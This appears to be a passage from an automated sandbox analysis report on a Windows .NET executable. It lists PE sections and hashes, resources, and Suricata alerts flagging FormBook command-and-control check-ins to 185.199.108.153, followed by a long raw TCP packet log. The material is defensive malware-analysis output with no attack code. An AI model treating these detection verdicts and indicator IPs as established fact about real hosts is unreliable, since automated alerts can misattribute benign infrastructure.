IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xa3850	0xa3a00	c04f4691ca79912d4bf20f1b732559af	False	0.9065185733384262	data	7.700504849845977	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xa6000	0x22e0	0x2400	6220df5b504d756466d51c9c01740c76	False	0.8782552083333334	data	7.377834344898448	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xaa000	0xc	0x200	106387603dce89e801b2d8c2a64f424f	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xa60c8	0x1e50	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9755154639175257
RT_GROUP_ICON	0xa7f28	0x14	data	1.05
RT_VERSION	0xa7f4c	0x38e	data	0.43626373626373627

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-14T16:38:40.159985+0100	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.7	49709	185.199.108.153	80	TCP
2025-01-14T16:38:40.159985+0100	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.7	49709	185.199.108.153	80	TCP
2025-01-14T16:38:40.159985+0100	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.7	49709	185.199.108.153	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2025 16:37:53.467701912 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:53.467761040 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:53.472553015 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.472565889 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.561115980 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.561351061 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:53.566113949 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.624793053 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.624824047 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.624836922 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.624847889 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.624860048 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.624870062 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:53.624905109 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:53.625228882 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.625240088 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.625288010 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:53.625497103 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.625540018 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.625544071 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:53.625550985 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.625595093 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.625605106 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.625618935 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:53.625649929 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:53.626410961 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.626463890 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.626477957 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.626497984 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.626512051 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:53.626514912 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.626538038 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:53.627212048 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.627222061 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.627264977 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:53.713212967 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.713243008 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.713254929 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.713274002 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.713313103 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:53.713423967 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.713452101 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.713463068 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.713474989 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:53.713496923 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.713502884 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:53.713601112 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:53.751362085 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:53.752427101 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:53.752671957 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:53.753664970 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:53.754873037 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:53.756341934 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.757230997 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.757509947 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.758472919 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.759804010 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.851037979 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.851054907 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.851171970 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:53.852577925 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.852592945 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.852691889 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:53.853868961 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:53.854171038 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.854226112 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.854228020 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:53.854276896 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:53.854676008 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:53.856075048 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:53.856075048 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:53.858719110 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.859433889 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.861052990 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.939460039 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:53.941978931 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:53.948055029 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:54.036636114 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:54.038701057 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:54.043570995 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:54.050189972 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:54.050232887 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:54.050424099 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:54.052546978 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:54.053390980 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:54.058219910 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:54.081388950 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:54.081412077 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:54.083218098 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:54.083218098 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:54.083334923 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:54.088123083 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:54.163330078 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:54.163367033 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:54.163825989 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:54.165669918 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:54.165796995 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:54.169056892 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:54.170636892 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:54.170818090 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:54.186263084 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:54.186289072 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:54.186345100 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:54.188309908 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:54.188448906 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:54.193805933 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:54.262242079 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:54.262260914 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:54.262346983 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:54.274580002 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:54.285885096 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:54.285902023 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:54.285965919 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:54.313575983 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:54.314327002 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:54.315062046 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:54.315804958 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:54.316472054 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:54.319175005 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:54.320772886 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:54.364243984 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:54.492918015 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:54.497195959 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:54.497220993 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:54.497345924 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:54.536659002 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:54.585453987 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:54.594609022 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:54.599421024 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:54.690640926 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:54.739803076 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:54.767472982 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:54.772308111 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:54.798692942 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:54.803632021 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:54.833158970 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:54.838071108 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:54.838083029 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:54.842852116 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:54.845138073 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:54.849899054 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:54.864425898 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:54.890989065 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:54.926595926 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:54.942255974 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:54.942281008 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:54.942373991 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:54.945776939 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:54.952775955 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:54.953212976 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:54.974076986 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:54.979053020 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:54.990479946 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.032740116 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.047516108 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.047643900 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.058844090 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.062258005 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.067152023 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.067687035 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.083966017 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.084094048 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.084625006 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.109769106 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.114814997 CET	49674	443	192.168.2.7	104.98.116.138
Jan 14, 2025 16:37:55.115684032 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.130448103 CET	49675	443	192.168.2.7	104.98.116.138
Jan 14, 2025 16:37:55.135011911 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.155653000 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.155777931 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.159630060 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.173115015 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.173146963 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.195972919 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.200762033 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.217145920 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.238877058 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.244139910 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.262778044 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.266473055 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.266552925 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.289314032 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.289421082 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.297219038 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.324321032 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.329190016 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.332333088 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.339446068 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.372924089 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.390589952 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.390738010 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.399189949 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.417737007 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.417983055 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.432866096 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.438661098 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.456471920 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.461364031 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.479005098 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.500149012 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.511353016 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.516699076 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.532283068 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.536696911 CET	49672	443	192.168.2.7	104.98.116.138
Jan 14, 2025 16:37:55.541371107 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.549969912 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.558248043 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.593732119 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.596723080 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.610114098 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.611989975 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.635003090 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.637094975 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.651681900 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.653397083 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.690195084 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.692393064 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.706639051 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.708450079 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.730469942 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.732314110 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.747391939 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.749552011 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.785885096 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.789879084 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.802946091 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.805428982 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.825675011 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.829278946 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.843358040 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.846323967 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.883306026 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.885852098 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.898741007 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.900903940 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.922596931 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.928324938 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.940506935 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.942244053 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.979170084 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.982225895 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:55.994399071 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:55.997400045 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.022506952 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.024045944 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.035614967 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.037403107 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.075500011 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.077156067 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.090718985 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.092329979 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.117613077 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.120084047 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.130820036 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.133220911 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.171160936 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.173182964 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.185751915 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.185823917 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.185906887 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.187763929 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.214739084 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.217679024 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.226617098 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.228913069 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.268311977 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.268549919 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.268667936 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.270947933 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.282380104 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.284503937 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.312450886 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.314997911 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.323390961 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.325256109 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.376010895 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.378204107 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.378675938 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.380461931 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.386377096 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.408401012 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.411309958 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.418639898 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.421015024 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.466496944 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.470628023 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.477585077 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.477626085 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.477716923 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.480379105 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.480473042 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.485316992 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.514524937 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.518661976 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.564007998 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.564089060 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.567545891 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.572323084 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.573873997 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.576504946 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.579345942 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.579360008 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.579416990 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.581845999 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.582319021 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.586668015 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.632110119 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.661097050 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.664725065 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.667756081 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.667840004 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.669614077 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.670061111 CET	49699	443	192.168.2.7	13.107.246.45
